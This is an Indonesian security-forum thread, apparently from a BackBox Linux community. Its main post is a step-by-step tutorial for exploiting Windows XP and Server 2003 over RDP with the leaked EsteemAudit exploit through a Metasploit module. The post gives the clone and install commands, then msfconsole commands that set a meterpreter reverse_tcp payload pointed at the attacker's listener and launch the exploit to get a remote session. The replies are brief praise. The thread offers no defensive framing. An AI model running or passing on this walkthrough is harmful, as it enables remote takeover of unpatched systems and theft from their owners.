NEW CONTENT RANDOM THREAD Unread Post

RDP Exploit dengan EsteemAudit

by penjagalilin - 06-11-2017 at 12:03 PM
penjagalilin
Hydrus
Hydrus
Posts:
28
Joined:
Jun 2016
Likes:
1
Reputation:
0
2 Year Of Member
#1
OP
Posted: 06-11-2017, 12:03 PM
Setelah ramai dengan Eternal Exploit pada WannaCry Ransomware, masih ada salah satu Exploit dari NSA yang belum di-patch! EsteemAudit atau disebut dengan CVE-2017-9073 adalah sebuah Exploit Remote Desktop Connection (RDP) pada sistem operasi Windows Server 2003 dan Windows XP.

[Image: Untitled-1.png]

Dalam post ini saya akan memakai EsteemAudit dari FuzzyBunch yang sudah di porting menjadi module Metasploit


1. Download & ekstrak file yang dibutuhkan
Source : Esteemaudit-Metasploit

Atau clone langsung seperti berikut

Code:
root@attackermachine:~/tool# git clone https://github.com/BlackMathIT/Esteemaudit-Metasploit.git
root@attackermachine:~/tool# cd Esteemaudit-Metasploit/
root@attackermachine:~/tool/Esteemaudit-Metasploit# ls -l



2. Didalam nya akan ada 2 file dan 1 folder. Pindahkan semua file yang dibutuhkan ke direktori yang diperlukan.

Code:
root@attackermachine:~/tool/Esteemaudit-Metasploit# mkdir /opt/metasploit-framework/modules/exploits/windows/rdp
root@attackermachine:~/tool/Esteemaudit-Metasploit# cp esteemaudit.rb /opt/metasploit-framework/modules/exploits/windows/rdp/
root@attackermachine:~/tool/Esteemaudit-Metasploit# cd files/
root@attackermachine:~/tool/Esteemaudit-Metasploit/files# mkdir /usr/share/esteemaudit
root@attackermachine:~/tool/Esteemaudit-Metasploit/files# cp * /usr/share/esteemaudit/



3. Buka msfconsole dan mulai exploitasi dengan EsteemAudit

Code:
msf > use exploit/windows/rdp/esteemaudit
msf exploit(esteemaudit) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(esteemaudit) > set LHOST IP_LISTENER_ATTACKER
msf exploit(esteemaudit) > set LPORT PORT_LISTERNER_ATTACKER
msf exploit(esteemaudit) > set TARGETARCHITECTURE x86

Jika target/korban adalah 64bit maka :
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set TARGETARCHITECTURE x86 64-bit 

Lihat target apa saja yang bisa di exploit dengan modul ini dengan perintah berikut

Code:
msf exploit(esteemaudit) > show targets

[Image: Lp-lKatrRRWov39DR-Ykww.png]

Set target sesuai urutan nomor list yang ada dan jalankan exploit. Misalnya jika targetnya adalah Windows XP SP2 maka seperti berikut.

Code:
msf exploit(esteemaudit) > set TARGET 4
msf exploit(esteemaudit) > exploit

Jika sukses akan terbuka sesi meterpreter seperti berikut.

[Image: aIkCQ0tqRV2IE2LSpSZMog.png]




Bonus Video :







NOTES :
Hanya untuk RDP pada server windows yang menggunakan DOMAIN, bukan WORKGROUP.

Oke sekian pos nya, semoga bermanfaat. Terimakasih.
{There's no God in My Code}
Message
Reply
Find Posts
♔ koboi ♔
Administrator
Administrators
Posts:
91
Joined:
Mar 2016
Likes:
2
Reputation:
0
2 Year Of Member
#2
Posted: 06-11-2017, 12:21 PM
semakin di depan (y)
Message
Reply
Find Posts
penjagalilin
Hydrus
Hydrus
Posts:
28
Joined:
Jun 2016
Likes:
1
Reputation:
0
2 Year Of Member
#3
OP
Posted: 06-13-2017, 01:27 AM
zeeeeb mhanx
{There's no God in My Code}
Message
Reply
Find Posts
♔ Hightech ♔
Network Security Analyst
Administrators
Posts:
18
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#4
Posted: 06-14-2017, 03:24 PM
Mantap mhanx
={EXPLORE|EXPLOIT|HAVE FUN!}=
Message
Reply
Find Posts
Register an account or login to reply
Create an account
Create a free account today and start posting right away. It only takes a few seconds.
Login
Log into an existing account.
Navigation
Latest News
Bugtracker
Team
Mark forum as read
Community
Banlist
Usergroups
Memberlist
Statistics
Help/Account
Help Documents and Rules
Contact
Login
Create an account
About Us
Forum Backbox Indonesia adalah salah satu media pembelajaran bagi siapa saja yang ingin belajar mengenai dunia Open Source khususnya untuk memperdalam Backbox Linux.
Posts:
971
Members:
1322
Threads:
199
Resources:
0
New :
spongebob